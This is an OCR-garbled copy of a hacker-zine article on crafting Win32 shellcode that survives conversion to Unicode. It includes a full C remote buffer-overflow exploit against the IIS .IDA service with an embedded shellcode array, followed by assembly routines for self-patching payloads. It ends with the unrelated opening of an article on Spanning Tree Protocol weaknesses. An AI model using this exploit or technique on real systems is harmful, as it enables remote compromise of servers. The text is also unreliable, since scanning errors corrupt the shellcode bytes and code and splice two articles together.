Runic Variation Selectors 

Tagalog Combining Half Marks 

Hanunoo CJK Compatibility Forms 
Buhid Small Form Variants 

Tagbanwa Arabic Presentation Forms-B 
Khmer Halfwidth and Fullwidth Forms 
Mongolian Specials 

Limbu Linear B Syllabary 

Tai Le Linear B Ideograms 

Khmer Symbols Aegean Numbers 

Phonetic Extensions Old Italic 

atin Extended Additional Gothic 

Greek Extended Deseret 

General Punctuation Shavian 

Superscripts and Subscripts Osmanya 


Currency Symbols 

Combining Marks for Symbols 
Letterlike Symbols 

Number Forms 

Arrows 

Mathematical Operators 
Miscellaneous Technical 
Control Pictures 

Optical Character Recognition 
Enclosed Alphanumerics 

Box Drawing 


Yes it’s impressive. 


Microsoft says 


"Unicode is a worldwide character-encoding standard. Windows NT, 


2000, and Windows XP use it exclusivel 


and string manipulation. Unicode simp] 


Cypriot Syllabary 

Byzantine Musical Symbols 

Musical Symbols 

Tai Xuan Jing Symbols 
Mathematical Alphanumeric Symbols 
CJK Unified Ideographs Extension B 
CJK Compatibility Ideographs Supp. 
Tags 

Variation Selectors Supplement 
Supplementary Private Use Area-A 
Supplementary Private Use Area-B 


Windows 
for character 
software and 


y at th 
ifies localization o 


system level 


improves multilingual text processing. 


By implementing it in your 


applications, 
capabilities for global marketing, 
possible character code." 


you can enable the application with universal 
using a single binary file for every 


data exchange 


Wa have to notice that The Windows programming interface uses ANSI and 


Unicode API’s for each API, 


for example: 


The API MessageBox (displays a msgbox of course) 
Is exported by User32.dll with 
MessageBoxA (ANST) 
MessageBoxW (Unicode) 


ndard C-type string as an argument 
strings as arguments. 


MessageBoxA will accept a sta 
MessageBoxW requieres Unicode 


According to Microsoft, internal use of strings is handled by the system 
itself that ensures a transparent translation of strings between different 
standards. 

But if you want to use ANSI i 
just have to define UNICODE a 
version. 

This sounds logical to me, 


n a C program compiling under windows, you 
nd every API will be replaced by its ‘W’ 


let’s get to the point now... 


--[ 1 


Introduction 


11.txt Wed Apr 26 09:43:44 2017 4 


We will consider the following situation 


You send some data to a vulnerable server, and your data is considered as 
ASCII (standard 8-bits character encoding), then your buffer is translated 
into unicode for compatibility reasons, and then an overflow occurs with 
your transformed buffer. 


For example, such an input buffer 
4865 6C6C 6F20 576F 726C 6420 2100 0000 Hello World !... 
0000 0000 0000 0000 0000 0000 0000 OOOO ................ 


Would turn into 
4800 6500 6CO00 6C00 6F00 2000 5700 6F00 H.e.1l.1l.o. .W.o. 
7200 6C00 6400 2000 2100 0000 0000 0000 r.l.d. .!....... 


Then bang, overflow (yeah i know my example is stupid) 


Under Win32 plateforms, a process usually starts at 00401000, this makes 
it possible to smash EIP with a return address that looks like 


So even with such a transformation, exploitation is still possible. 

It will be a lot harder to get a working shellcode. 

One possibility is to stuff the stack with untranformed data than contains 
the same shellcode many times, then do the overflow with the tranformed 
buffer, and make it return to one of your numerous shellcodes. 

Here we assume that this was impossible because all buffers are unicode. 
Needless to say that our assembly code won’t go through this safely. 

So we need to find a way to build a shellcode that resists to such a 
transformation. We need to find opcodes containing null bytes to build our 
shellcode. 


Here is an example, it is a bit old but it is an example of how we can 
manage to get a shellcod xecuted even if our sent buffer is f**cked 
(This exploit was working on my box, it runs against IIS www service) 


CUT HERE 


/* 
IIS .IDA remote exploit 


formatted return address : 0x00530053 
IIS sticks our very large buffer at 0x0052.... 
We jump to the buffer and get to the point 


by obscurer 


yp 


include <windows.h> 
include <winsock.h> 
include <stdio.h> 


void usage(char *a); 
int wsa(); 


/* My Generic Win32 Shellcode */ 

unsigned char shellcode[]={ 

"\ xXEB\x68\x4B\x45\x52\x4E\x45\x4C\x13\x12\x20\x67\x4C\x4F\x42\x41" 
"\x4C\x61\x4C\xX4C\xX4F\x%43\x20\X7F\xX4C\x43\x52\x45\x41\x54\x20\x7E" 


"\x09\x05\x01\x01\x69\x01\x01\x01\x01\x57\xXFE\x96\x11\x05\x01\x01" 
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"\x69\x01\x01\x01\x01\xFE\x96\x15\x05\x01\x01\x90\x90\x90\x90\x00"}; 


int main (int argc, char **argv) 


{ 


nt sock; 
truct hostent *host; 
truct sockaddr_in sin; 


a 
s 
s 
int index; 


Q 


har *xploit; 
char *longshell; 


char retstring[250]; 


if(argce!=4&&argce!=5) usage(argv[0]); 


if (wsa()==FALSE) 
{ 


printf("Error : cannot initialize winsock\n"); 
exit (0); 


int size=0; 


if (argc==5) 
size=atoi(argv[4]); 


printf ("Beginning Exploit building\n"); 


xploit=(char *)malloc(40000+size) ; 
longshell=(char *)malloc(35000+size) ; 
if (!xploit||!longshell) 
{ 

printf("Error, not enough memory to build exploit\n"); 
return 0; 


} 


if (strlen(argv[3])>65) 
{ 
printf("Error, URL too long to fit in the buffer\n"); 
return 0; 


} 


for (index=0; index<strlen(argv[3]);index++) 
shellcode [index+139]=argv[3] [index] *0x20; 


memset (xploit,0,40000+size) ; 
memset (longshell,0,35000+size) ; 
memset (longshell, ’\x41’, 30000+size); 


for (index=0; index<sizeof (shellcode) ; index+t) 
longshell [index+30000+size]=shellcode [index]; 


longshell[30000+sizeof (shellcode) +size]=0; 


memset (retstring,’S’,250); 


sprintf (xploit, 


"GET /NULL.ida?%s=x HTTP/1.1\nHost: localhost\nAlex: 


retstring, 
longshell); 


$s\n\n", 
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printf ("Exploit build, connecting to %s:%d\n",argv[1],atoi(argv[2])); 


sock=socket (AF_INET, SOCK_STREAM, 0) ; 
if (sock<0) 
{ 


printf("Error : Couldn’t create a socket\n"); 
return 0; 


if ((inet_addr (argv[1]))==-1) 
{ 
host = gethostbyname (argv[1]); 
if (!host) 
{ 


printf ("Error : Couldn’t resolve host\n"); 
return 0; 
} 
memcpy ((unsigned long *)&sin.sin_addr.S_un.S_addr, 
(unsigned long *)host->h_addr, 
sizeof (host->h_addr) ); 


} 


else sin.sin_addr.S_un.S_addr=inet_addr(argv[1]); 


sin.sin_family=AF_INET; 
sin.sin_port=htons(atoi(argv[2])); 


index=connect (sock, (struct sockaddr *)&sin,sizeof(sin)); 
if (index==-1) 


{ 


printf("Error : Couldn’t connect to host\n"); 
return 0; 


} 
printf ("Connected to host, sending shellcode\n") ; 
index=send (sock, xploit,strlen(xploit),0); 


if (index<1) 
{ 


printf("Error : Couldn’t send trough socket\n"); 
return 0; 


} 
printf ("Done, waiting for an answer\n"); 
memset (xploit,0, 2000); 


index=recv (sock, xploit,100,0); 
if (index<0) 
{ 
printf("Server crashed, if exploit didn’t work, 
increase buffer size by 10000\n"); 


exit (0); 


printf ("Exploit didn’t seem to work, closing connection\n",xploit); 


closesocket (sock); 
printf ("Done\n") ; 


return 0; 


} 


CUT HERE 
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In this example, th xploitation string had to be as follows 


"GET /NULL.ida? [BUFFER]=x HTTP/1.1\nHost: localhost\nAlex: [ANY]\n\n" 


If [BUFFER] is big enough, EIP is smashed with what it contains. 

But, i’ve noticed that [BUFFER] has been transformed into unicode when the 
overflow occurs. But something interesting was that [ANY] was a clean 
ASCII buffer, being mapped in memory at around : 00530000... 

So i tried to set [BUFFER] to "SSSSSSSSSSSSS" (S = 0x53) 

After the unicode transformation, it became 


...00 53 00 53 00 53 00 53 00 53 00 53 00 53 00 53 00 53... 


The EIP was smashed with : 0x00530053, IIS returned on somewhere around 
[ANY], where i had put a huge space of 0x41 = "A" (increments a register) 
and then, at the end of [ANY], my shellcode. 

And this worked. But if we have no clean buffer, we are unable to install 
a shellcode somewhere in memory. We have to find another solution. 


--[{ 2 - Our Instructions set 


We must keep in mind that we can’t use absolute addresses for calls, jmp... 
because we want our shellcode to be as portable as possible. 

First, we have to know which opcodes can be used, and which can’t be used 
in order to find a strategy. As used in the Intel papers 


r32 refers to a 32 bits register (eax, esi, ebp...) 
r8 refers to a 8 bits register (ah, bl, cl...) 


— UNCONDITIONAL JUMPS (JMP) 


JMP’s possible opcodes are EB and E9 for relative jumps, we can’t use them 
as they must be followed by a byte (00 would mean a jump to the next 
instruction which is fairly unuseful) 


FF and EA are absolute jumps, these opcodes can’t be followed by a 00, 
except if we want to jump to a known address, which we won’t do as this 
would mean that our shellcode contains harcoded addresses. 


7 


— CONDITIONAL JUMPS (Jcc : JNE, JAE, JNE, JL, JZ, JING, JNS...) 


The syntaxe for far jumps can’t be used as it needs 2 consecutives non null 
bytes. the syntaxe for near jumps can’t be used either because the opcode 
must be followed by the distance to jump to, which won’t be 00. Also, 

JMP r32 is impossible. 


- LOOPs (LOOP, LOOPcc : LOOPE, LOOPNZ..) 


Same problem : EO, or El, or E2 are LOOP opcodes, they must me followed by 
the number of bytes to cross... 


— REPEAT (REP, REPcc : REPNE, REPNZ, REP + string operation) 


All this is impossible to do because thoses intructions all begin with a 
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two bytes opcode. 


- CALLs 


Only the relative call 
E8 ?? ?? ?? ?? 


In our case, 
E8 00 ?? 00 ?? 
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can be usefull 


we must have 
(with each ?? 


!= 00) 


We can’t use this as our call would be at least 01000000 bytes further... 


Also, CALL r32 is 


impossible. 


- SET BYTE 


This instruction needs 


Hu oh... This is harder as it may seem... 
we can’t do anything conditional ! 
no Jumps and no Calls are permitted, 


Then, what can we do ? 


EAX register... 


ON CONDITION 


The fact that we have a lot of NULLS will 
Because when you use 


(SETcc) 


(SETA is OF 97 


2 non nul bytes. for example). 


We can’t do any test... Because 
Moreover, we can’t move along our code 
and no Loops nor Repeats can be done. 


allow a lot of operation on the 
BAX, [EAX], AX, etc.. as operand, 


it is often coded in Hex with a OO. 


- SINGLE BYTE 


We can use any single byte opcode, 
XCHG and PUSH/POP are also possible, 


register, 
So we can do 
XCHG £32,7r32 


OPCODES 


this will 


give us any INC or DEC on any 
with registers as operands. 


POP r32 

PUSH r32 

Not bad. 

—- MOV 

8800 mov [eax],al 
8900 mov [eax],eax 
8A00 mov al, [eax] 
8BO00 mov eax, [eax] 


Quite unuseful. 


A100??00?? mov eax, [0x??00?700] 

A200??00?? mov [0x??00??00],al 

A300??00?? mov [0x??00??00],eax 

These are unuseful to us. (We said no hardcoded addresses). 
B_00 mov r8,0x0 

A4 movsb 


Maybe we can use these ones. 
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|B_00??00?? mov xr32,0x??00??00 
|C600?? mov byte [eax],0x?? 
| | 
| This might be interesting for patching memory. 
| 


— ADD 


00__ add [r32], r8 
Using any register as a pointer, we can add bytes in memory. 
00__ add r8,r8 


Could be a way to modify a register. 


— XOR 


3500?7?00?? xor eax,0x??00?700 


| 
| 
| 
| Could be a way to modify the EAX register. 
| 


— PUSH 


| 6A00 push dword 0x00000000 

|68002??00?? push dword 0x??00?7?00 

| | 
| Only this can be made. 

| | 


--[{ 3 - Possibilities 


First we have to get rid of a small detail : the fact that we have 
such 0x00 in our code may requier caution because if you return from 
smashed EIP to ADDR 


2? 00 2? 00 ?? 00 ?? 00 ?? 00 
| | 
ADDR 


The result may be completely different if you ret to ADDR or ADDR+t1 ! 
But, we can use as ’NOP’ instruction, instructions like 


| 0400 add al,0x0 
| | 


Because : 000400 is : add [2*eax],al, we can jump wherever we want, we 
won’t be bothered by the fact that we have to fall on a 0x00 or not. 


But this need 2*eax to be a valid pointer. 
We also have 


106 push es | 
| 0006 add [esi],al 
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OFOOOF str [edi 

OOOF add [edi],cl 
2E002E add [cs:esi],ch 
002E add [esi],ch 

2F das 

002F add [edi],ch 

37 aaa 

0037 add [edi],dh 


ie ear CEG CEC... 4 


We are just to be careful with this alignment problem. 


Next, let’s s what can be done 


XCHG, INC, DEC, PUSH, POP 32 bits registers can be done directly 


We can set a register (r32) to 00000000 


|push dword 0x00000000 
[pop r32 | 
| | 


Notice that anything that can be done with EAX can be done with any other 
register thanxs to the XCHG intruction. 


For example we can set any value to EDX with a 0x00 at second position 
(for example : 0x12005678): 


|mov edx,0x12005600 ; EDX = 0x12005600 

|mov ecx, 0xAA007800 

|add dl,ch ; EDX = 0x12005678 

| | 

More difficult : we can set any value to EAX (for example), but we will 


have to use a little trick with the stack 


mov eax, 0xAA003400 ; EAX = O0xAA003400 
push eax 
dec esp 
pop eax ; EAX = 0x003400?? 
add eax, 0x12005600 ; EAX = 0x123456?? 
mov al,0x0 ; EAX = 0x12345600 


mov ecx, 0xAA0N07800 
add al,ch 


; finally : EAX = 0x12345678 


Importante note : we migth want to set some 0x00 too 


If we wanted a 0x00 instead of 0x12, then instead of adding 0x00120056 to 
the register, we can simply add 0x56 to ah 


|mov ecx, 0xAA005600 
|add ah,ch | 


If we wanted a 0x00 instead of 0x34, then we just need EAX = 0x00000000 to 
begin with, instead of trying to set this 0x34 byte. 
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If we wanted a 0x00 instead of 0x56, 
ah by adding 0x100 - 0x56 OxAA to it 
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the 
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n it is simple to substract 0x56 to 


; EAX = 0x123456?? | 
|mov ecx, OxAAOOAAO0O 
|add ah,ch | 
| 
If we wanted a 0x00 instead of the last byte, just give up the last line. 


Maybe if you haven’t thougth of this, 


remember you can jump to a given 
in EAX) 


location with (assuming the address is 
| 50 push eax 
|C3 ret 


You may use this in case of a desperat 


--[ 4 - The Strategy 


It seems nearly impossible to get a wo 
of opcodes... But it is not ! 


e situation. 


rking shellcode with such a small set 


The idea is the following 
Given a working shellcode, we must get rid of the 00 between each byte. 
We need a loop, so let’s do a loop, assuming EAX points to our shellcode 
Loop_code 
; eax points to our shellcode 
; ebx is 0x00000000 
; ecx is 0x00000500 (for example) 
label: 
43 inc ebx 
8A1458 mov byte dl, [eaxt2*ebx] 
881418 mov byte [eaxtebx],dl 
E2F7 loop label 
Problem not unicode. So let’s turn it into unicode 


would be 


43 8A 14 58 88 14 18 E2 F7, 
43 00 14 00 88 00 18 00 F7 


Then, 
EAX, 


considering the fact that we 
it will be simple to tranform 


We just need to do this (we assume 


can write data at a location pointed by 
thoses 00 into their original 


values. 


EAX points to our data) 


| 40 inc eax | 

| 40 inc eax | 
|C60058 mov byte [eax],0x58 

| | 
Problem still not unicode. So that 2 bytes like 0x40 follow, we need a 
00 between the two... As 00 can’t fit, we need something like 007700, 


which won’t interfere with our busines 


add [ebp+0x0],al (0 


will do fine. Finally we get 


Ss, so 


x004500) 
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| 40 
|004 
| 40 
| 004 
|C60 
| 


500 


500 
058 
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inc 
add 
inc 
add 
mov 


eax 


[ebp+ 


eax 


[ebp+ 


byte 


tOxO],al 


t+OxO],al 


[eax],0x58 


-> [40 00 45 00 40 00 45 00 C6 00 58] is nothing but a unicode string ! 


Before the loop, 


we must have some things done : 
First we must set a proper counter, i propose to set 


ECX to 0x0500, this 


will deal with a 1280 bytes shellcode (but feel free to change this). 
->This is easy to do thanks to what we just noticed. 
Then we must have EBX 


—->It is al 


the 


Assu 


ming 


lso easy to do. 
Finally we must have 
nulls. 
->This wil 


EAX points to our code, 
code that follows it from nulls 


ll be the harder part of the job, so we will see that 


0x00000000, so that the loop works properly. 
EAX pointing to our shellcode in order to take away 


later. 


we can build a header that will clean the 
(we use add [ebp+0x0],al to align nulls) 


-> Ist part : we do EBX=0x00000000, and ECX=0x00000500 (approximative size 


of buffer) 

6A00 push dword 0x00000000 

6A00 push dword 0x00000000 

5D pop ebx 

004500 add [ebp+0x0],al 

59 pop ecx 

004500 add [ebp+0x0],al 
BA00050041 mov edx, 0x41000500 

OOF5 add ch,dh 
-> 2nd part The patching of the ’loop code’ 


43 00 14 00 88 00 18 00 F7 has to be : 43 8A 14 58 88 14 18 E2 F7 
So we need to patch 4 bytes exactly which is simple 


(N.B 


using {add dword 


use a single byte mov 


{mov byte 


[eax],0x??} to do this) 


[eax],0x00??00??} takes more bytes so we will 


mov 
inc 
inc 
mov 
inc 
inc 
mov 
inc 


byte 
eax 
eax 
byte 
eax 
eax 
byte 
eax 


eax], 0x8A 


eax] ,0x58 


eax],0x14 


; one more inc to get EAX to the shellcode 


Which does, 


with ’align’ 


instruction {add [ebp+0x0],al} 


004 
C60 
004 


40 
004 
40 
004 
C60 
004 


500 
O8A 
500 


500 


500 


058 
500 


add 
mov 
add 


inc 
add 
inc 
add 
mov 
add 


byte 


eax 
ebp+ 
eax 
ebp+ 
byte 
ebp+ 


ebp+0x0 
[eax],0x8A ; Ox8A 
ebp+0x0 ] 


yal 


ra 


0x58 ; 0x58 
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40 inc eax 

004500 add [ebp+0x0],al 

40 inc eax 

004500 add [ebp+0x0],al 

c60014 mov byte [eax],0x14 ; 0x14 
004500 add [ebp+0x0],al 

40 inc eax 

004500 add [ebp+0x0],al 

40 inc eax 

004500 add [ebp+0x0],al 

C600E2 mov byte [eax],0xE2 ; OxE2 
004500 add [ebp+0x0],al 

40 inc eax 

004500 add [ebp+0x0],al 
This is good, we now have EAX that points to the end of the loop, that is 


to say : the shellcode. 


-> 3rd part : The loop code (stuffed with nulls of course) 
43 db 0x43 
00 db 0x00 ; overwritten with Ox8A 
14 db 0x14 
00 db 0x00 ; overwritten with 0x58 
88 db 0x88 
00 db 0x00 ; overwritten with 0x14 
18 db 0x18 
00 db 0x00 ; overwritten with OxE2 
F7 db OxF7 


Just after this should be placed the original working shellcode. 


Let’s count the size of this header : (nulls don’t count of course) 


lst part : 10 bytes 
2nd part : 27 bytes 
3rd part : 5 bytes 


Total : 42 bytes 


I find this affordable, because i could manage to make a remote Win32 
shellcode fit in around 450 bytes. 


So, at th nd, we made it : a shellcode that works after it has been 
turn into a unicode string ! 


Is this really it ? No of course, we forgot something. I wrote that we 
assumed that EAX was pointing on the exact first null byte of the loop 
code. But in order to be honest with you, i will have to explain a way 
to obtain this. 


--[ 5 - Captain, we don’t know our position ! 


The problem is simple : We had to perform patches on memory to get our loop 
working well. So we need to know our position in memory because we ar 
patching ourself. 

In an assembly program, an easy way to do this would be 


|call label 
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| label: 
|pop eax 


Will get the absolute memory address of label in EAX. 


In a classic shellcode we will need to do a call to a lower address 
to avoid null bytes 


jmp jump_label 


call_label: 
pop eax 
push eax 
ret 

jump_label: 


call call_label 
KKK 


Will get the absolute memory address of /'****’ 


But this is impossible in our case because we can’t jump nor call. 
Moreover, we can’t parse memory looking for a signature of any kind. 
I’m sure there must be other ways to do this but i could only 3 


-> Ist idea : we are lucky. 


If we are lucky, we can expect to have some registers pointing to a place 
near our evil code. In fact, this will happen in 90% of time. This place 
can’t be considered as harcoded because it will surely move if the process 
memory moves, from a machine to another. (The program, before it crashed, 
must have used your data and so it must have pointers to it) 

We know we can add anything to eax (only eax) 

so we can 


—- use XCHG to have the approximate address in EAX 
—- then add a value to EAX, thus moving it to wherever we want. 


The problem is that we can’t use : add al,r8 or and ah,r8, because don’t 
forget that 

EAX=0x000000FF + add al,1 = EAX=0x00000000 

So thoses manipulations will do different things depending on what EAX 
contains. 


So all we have is : add eax, 0x??00??00 
No problem, we can add 0x1200 (for example) to EAX with 


|0500110001 add eax, 0x01001100 
| OSOO0100FF add eax, OxFF000100 


Then, it is simple to add some align data so that EAX points on what we 
want. 
For example 


| 0400 add al,0x0 


would be perfect for align. 
(N.B: we will maybe need a little inc EAX to fit) 


Some extra space may be requiered by this methode (max : 128 bytes because 
we can only get EAX to point to the nearest address modulus 0x100, then we 
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have to add align bytes. As each 2 bytes is in fact 1 buffer byte becaus 
of the added null bytes, we must at worst add 0x100 / 2 = 128 bytes) 


—-> 2nd idea : a little less lucky. 


If you can’t find a close address within yours registers, you can maybe 
find one in the stack. Let’s just hope your ESP wasn’t smashed after the 
overflow. 
You just have to POP from the stack until you find a nice address. This 
methode can’t be explained in a general way, but the stack always contains 
addresses the application used before you bothered it. Note that you can 
use POPAD to pop EDI, ESI, EBP, EBX, EDX, ECX, and EAX. 

Then we use the same methode as above. 


-> 3rd idea : god forgive me. 


Here we suppose we don’t have any interesting register, or that the values 
that the registers contain change from a try to another. Moreover, there’s 
nothing interesting inside the stack. 


This is a desperate case so —-> we use an old style samoura suicide attack. 
My last idea is to 
- Take a "random" memory location that has write access 


- Patch it with 3 bytes 
- Call this location with a relative call 


First part is the more hazardous : we need to find an address that is 
within a writeable section. We’d better find one at the end of a section 
full on nulls or something like that, because we’re gonna call quite 
randomly. The easiest way to do this is to take for example the .data 
section of the target Portable Executable. It is usually a quite large 
section with Flags : Read/Write/Data. 

So this is not a problem to kind of ’hardcode’ an address in this area. 
So for the first step we just pisk an address in the middle of this, 

it won’t matter where. 

(N.B : if one of your register points to a valid location after the 
overflow, you don’t have to do all this of course) 

We assume the address is 0x004F1200 for example : 


Using what we saw previously, it is easy to set EAX to this address 


B8004F00AA mov eax, OxAA0D04F00 ; EAX = OxAAO04F00 
50 push eax 
4C dec esp 
58 pop eax ; EAX = 0x004F00?? 
BOOO mov al,0x0 ; EAX = 0x004F0000 
B9001200AA mov ecx, 0xAA001200 
OOEC add ah,ch 

; finally : EAX = 0x004F1200 


Then we will patch this writeable memory location with (guess what) 


pop eax 
push eax 
ret 


Hex code of the patch : [58 50 C3] 


This would give us, after we called this address, a pointer to our code in 
EAX. This would be the end of the trouble. So let’s patch this 
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Remember that EAX contains the address we are patching. What we are going 
to do is first patch with 58 00 C3 00 then move EAX 1 byte ahead, and put 
the last byte : 0x50 between the two others. 

(N.B : don’t forget that byte are pushed in a reverse order in the stack) 


|C7005800C300 mov dword [eax] ,0x00C30058 
| 40 inc eax | 
| C60050 mov byte [eax],0x50 

| 


Done with patching. Now we must call this location. I no i said that we 
couldn’t call anything, but this is a desperate case, so we use a 
relative call : 


E800?2?00!! call (here + 0x!!00?700) 
| (*23) | 
| | 


In order to get this methode working, you have to patch the end of a large 
memory section containing nulls for example. Then we can call anywhere in 
the area, it will end up executing our 3 bytes code. 


After this call, EAX will have the address of (**), we are saved because w 
just need to add EAX a value we can calculate because it is just a 
difference between two offsets of our code. Therefore, we can’t use 
previous technique to add bytes to EAX because we want to add less then 
0x100. So we can’t do the {add eax, imm32} stuff. Let’s do something else 


add dword [eax], byte 0x?? 


is the key, because we can add a byte to a dword, this is perfect. 


EAX points to (**), se can can use this memory location to set the new EAX 
value and put it back into EAX. We assume we want to add 0x?? to eax 
(N.B : Ox?? can’t be larger than 0x80 because the 

add dword [eax], byte 0x?? 
we are using is signed, so if you set a large value, it will sub instead of 
add. (Then add a whole 0x100 and add some align to your code but this won’t 
happen as 42*2 bytes isn’t large enough i think) 


|0400 ad al,0x0 ; the 0x04 will be overwritten| 
|8900 mov [eax],eax 
|8300?? add dword [eax],byte 0x?? 
| 8BO00 mov eax, [eax] 
| 


Everything is alright, we can make EAX point to the exact first null byte 
of loop_code as we wished. 
We just need to calculate 0x?? (just count the bytes including nulls 
between loop_code and the call and you’11l find 0x5A) 


-—-[ 6 — Conclusion 


Finally, we could make a unishellcode, that won’t be altered after a 
str to unicode transformation. 

I’m waiting other ideas or techniques to perform this, i’m sure there 
are plenty of things i haven’t thought about. 


Thanks to 
— NASM Compiler and disassembler (i like its style =) 
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- Datarescue IDA 
— Numega SoftIce 
- Intel and its processors 


Documentation 
—- http://www.intel.com for the official intel assembly doc 


Greetings go to 
—- rix, for showing us beautiful things in his articles 
— Tomripley, who always helps me when i need him ! 


--| 7 - Appendix : Code 


For test purpose, i give you a few lines of code to play with (NASM style) 
It is not really a code sample, but i gathered all my examples so that you 
don’t have to look everywhere in my messy paper to find what you need... 


—- main.asm 
Sinclude "\Nasm\include\language.inc" 


[global main] 


segment .code public use32 
sSlaLlt:: 


KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK 


ees Assuming EAX points to (*) (see below) * 
KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK 


1’ 


; Setting EBX to 0x00000000 and ECX to 0x00000500 


push byte 00 ; 6A00 

push byte 00 ; 6A00 

pop ebx 7. 9D 

add [ebp+0x0],al ; 004500 

pop ecx aa 

add [ebp+0x0],al ; 004500 

mov edx,0x41000500 ; BAOO0050041 
add ch,dh ; OOF5S 


; Setting the loop_code 


add [ebp+0x0],al ; 004500 
mov byte [eax],0x8A ; C6008A 
add [ebp+0x0],al ; 004500 
inc eax ; 40 
add [ebp+0x0],al ; 004500 
inc eax - AQ 


add [ebp+0x0],al ; 004500 
mov byte [eax],0x58 ; C60058 


add [ebp+0x0],al ; 004500 
inc eax ; 40 
add [ebp+0x0],al ; 004500 
inc eax ; 40 
add [ebp+0x0],al ; 004500 
mov byte [eax],0x14 ; C60014 
add [ebp+0x0],al ; 004500 
inc eax ; 40 


add [ebp+0x0],al ; 004500 
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inc 
add 
mov 
add 
inc 
add 


eax 


[ebp+ 
byte 
[ebp+ 
eax 
[ebp+4 


t+OxO],al 
[eax], OxE2 
t+OxO],al 


tOxO0],al 


; Loop_code 


db 0x43 


db 0x00 


db 0x14 


db 0x00 


db 0x88 
db 0x00 ;0x14 
db 0x18 


db 0x00 


db OxF7 


; < Paste 


, 
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;Ox8A 


40 
004500 
C600E2 
004500 
40 
004500 


unicode’ shellcode there > 


EOF 
Then the 3 methodes to get EAX to point to the chosen cod 
(N.B The ’main’ code is 42*2 = 84 bytes long) 


—- methodel.asm 
KKEKKKK KKK KKK KKK KKK KKK KKK KKK KKK KK KKK KKK KKKKKKK 


* 


Adjusts EAX 


(+ OxXXYY bytes) 


; we added 0x(XX+1)00 to E 


; N.B OxXX != 0x00 

add eax, 0x0100XX00 ; O0500XX0001 

add [ebp+0x0],al ; 004500 

add eax, OxFF000100 ; O5000100FF 

add [ebp+0x0],al ; 004500 

; using add al,0x0 as a NOP instruction 
add al,0x0 ; 0400 

add al,0x0 ; 0400 

add al,0x0 ; 0400 

Pegaso <-- (0x100 - OxYY) /2 times 
add al,0x0 ; 0400 

add al,0x0 ; 0400 

add al,0x0 ; 0400 

; (N.B) if OxYY is odd then adda 

dec eax ; 48 

add [ebp+0x0],al ; 004500 


* 


KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK 


E 
> 
x 


KOF 


— methode2.asm 
KKK KKK KKK KKK KKK KKK KKK KKK KKK KKK KKK KKK KKKKK KKK 


7 
- * 
1’ 


1’ 


popad 

[ebp+ 
xchg eax, 
[ebp+ 


add 


add 


tOxO],al 


? 


t+OxO],al 


Basically 


c 


, 


POPs and XCHG 


61 

004500 

1 non null byte 
004500 


* 


KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK KKK 


(find out what to do here) 
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; do it again if needed, then use methodel to make everything okay 


KOF 


— methode3.asm 
KEKE KK KKK KKK KKK KK KKK KKK KKK KK KK KKK KKK KKKKK KKK 


; * Using a CALL * 


KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK 


; Get the wanted address 


mov eax, 0OxAA0N0??00 ; B800??00AA 
add [ebp+0x0],al ; 004500 
push eax 2 “50, 

add [ebp+0x0],al ; 004500 

dec esp 7; 4C 

add [ebp+0x0],al ; 004500 

pop eax ; 58 

add [ebp+0x0],al ; 004500 

mov al,0x0 ; BOOO 

mov ecx,0xAA00!!00 ; B900! !O0AA 
add ah,ch ; OOEC 

add [ebp+0x0],al ; 004500 


; EAX = 0x00??!!00 


; awfull patch, i agree 
mov dword [eax],0x00C30058 ; C7005800C300 


inc eax ; 40 

add [ebp+0x0],al ; 004500 
mov byte [eax],0x50 ; C60050 
add [ebp+0x0],al ; 004500 


; just pray and call 


call 0x???????? ; E800!!00?? 

add [ebp+0x0],al ; 004500 

; then add 90d = Ox5A to EAX (to reach (*), where the loop_code is) 

; case where 0xXX = 0x00 so we can’t use methodel 

add al,0x0 ; 0400 because we’re patching at [eax] 
mov [eax],eax ; 8900 

add dword [eax],byte Ox5A ; 83005A 

add [ebp+0x0],al ; 004500 

mov eax, [eax] ; 8BOO 
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Volume 0x0b, Issue 0x3d, Phile #0x0c of Ox0f 


| [ Fun with the Spanning Tree Protocol ] 


| [ Oleg K. Artemjev, Vladislav V. Myasnyankin ] 


Introduction. 


Developed in the lst part of 80th by International Standards Organization (ISO) 
seven-layer model of Open System Interconnection (OSI) presents a hierarchical 
structure, wher ach level has strictly assigned job & interface to upper & 
lower levels. Due to business needs modern equipment currently supports on the 
2nd OSI layer not only traditional frame forwarding & hardware address 
resolution, but also provides redundancy, multiplexing, load balancing & 
separation of information flows. Unfortunately, security issues at this layer 
are often left without attention. Here we’ll show weakness in implementation 
and algorithm of one of the second OSI layer (‘‘channel’’ (MAC+LLC) ) 

protocols - Spanning Tree Protocol (STP). This work uses our materials 
published in Russian: [2], [4]. 


Since we’re publishing an information about security vulnerabilities before 
a fix is ready on the market & since these information may be used by a 
malicious person we’ll write our article in such a way, so newbies (also known 
as ‘‘script kiddies’’ or ‘‘*black hats’’ - see [1]) would be unable to use 
this paper as a step-by-step ‘‘howto’’. We understand that different people 
have different opinion to this issue, but feel that this is almost single 
possible way to stimulate vendors to fix bugs much faster. Of course we 
already notified some vendors (Cisco, Avaya) about these vulnerabilities, but 
an answer was alike: ‘‘unless this gives money we won’t make investments’’. 
Well, sinc we’re interested in high level of security in switches & routers 


we use, we have to publish our investigations - thus we ’1ll make some pressur 
on hardware vendors to implement real security in their devices. Also we note, 
that vendors should be already informed via bugtragq & some - Cisco & Avaya - 


directly. Our first publication in Russian concerning STP vulnerabilities was 
made about one year ago. 

The volume of our materials written while analyzing STP protocol is too big 
to be published in one magazine article. Full information is available in the 


Internet at the project’s web page ([3]) and with the same restrictions which 
apply also to this publication (s license below). 
License. 


Kaka KS KS 


As a complain against trends to inhibit publications of security 
vulnerabilities in software (these tendencies are widely known to the public 
as a DMCA law in US [Digital Millennium Copyright Act]), these materials are a 
subject to the following license: 


License agreement. 
This paper is an intellectual property of it’s authors: Oleg Artemjev and 
Vladislav Myasnyankin (hereinafter writers). This paper may be freely used 
for the links, but its content or its part cannot be translated into foreign 
languages or included into any paper, book, magazine, and other electronic or 
paper issues without prior WRITTEN permissions of both writers. Moreover, in 
case of using materials of this research or refer to it, according given 
license you must provide complete information: full title, authorship and this 
license. You can freely distribute this paper electronically, if, and only if, 
all of the following conditions are met: 


1. This license agreement and article are not modified, including its PGP 
digital signature. Any reformatting of the text is prohibited. 
